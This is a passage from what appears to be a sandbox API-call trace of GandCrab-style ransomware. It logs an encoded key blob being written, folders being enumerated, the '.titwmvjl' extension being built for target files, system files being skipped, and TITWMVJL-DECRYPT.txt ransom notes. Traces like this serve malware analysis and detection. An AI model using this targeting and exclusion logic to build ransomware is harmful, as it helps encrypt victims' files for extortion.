43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.283] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0096.284] CloseHandle (hObject=0x2c4) returned 1 [0096.284] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.284] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.284] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x256)) [0096.285] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.285] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.285] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.285] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned 98 [0096.285] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0096.286] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.286] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.286] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0096.286] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0096.286] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503478 [0096.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.286] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.287] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.287] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.287] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.288] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.288] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.288] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock" [0096.288] lstrlenW (lpString=".titwmvjl") returned 9 [0096.288] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned 98 [0096.288] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.288] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 107 [0096.288] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned 98 [0096.288] lstrlenW (lpString=".lock") returned 5 [0096.288] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.288] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.288] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.288] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.289] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.289] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0096.289] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0096.289] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" [0096.289] lstrlenW (lpString=".titwmvjl") returned 9 [0096.289] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 85 [0096.289] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.289] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.titwmvjl") returned 94 [0096.289] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 85 [0096.289] lstrlenW (lpString=".ini") returned 4 [0096.289] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.289] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0096.289] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0096.289] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.290] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 85 [0096.290] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 85 [0096.290] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0096.290] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.290] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.290] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0096.290] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0096.290] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Shows Desktop.lnk" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" [0096.290] lstrlenW (lpString=".titwmvjl") returned 9 [0096.290] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 91 [0096.290] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.290] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.titwmvjl") returned 100 [0096.290] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 91 [0096.290] lstrlenW (lpString=".lnk") returned 4 [0096.290] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.291] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0096.291] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.291] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.291] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.291] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.291] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.291] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt" [0096.291] lstrlenW (lpString=".titwmvjl") returned 9 [0096.291] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 94 [0096.291] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.291] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 103 [0096.291] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 94 [0096.291] lstrlenW (lpString=".txt") returned 4 [0096.291] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.292] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.292] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.292] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.292] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 94 [0096.292] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 94 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.292] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.293] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.293] lstrcmpW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0096.293] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0096.293] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Window Switcher.lnk" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" [0096.293] lstrlenW (lpString=".titwmvjl") returned 9 [0096.293] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 93 [0096.293] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.293] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.titwmvjl") returned 102 [0096.293] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 93 [0096.293] lstrlenW (lpString=".lnk") returned 4 [0096.293] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.293] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0096.293] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.294] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.294] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0096.294] FindClose (in: hFindFile=0x503478 | out: hFindFile=0x503478) returned 1 [0096.295] CloseHandle (hObject=0x2c4) returned 1 [0096.295] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.295] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.295] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.295] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt" [0096.295] lstrlenW (lpString=".titwmvjl") returned 9 [0096.295] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned 81 [0096.295] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.295] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 90 [0096.295] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned 81 [0096.295] lstrlenW (lpString=".txt") returned 4 [0096.295] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.296] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.296] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.296] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.296] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned 81 [0096.296] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet 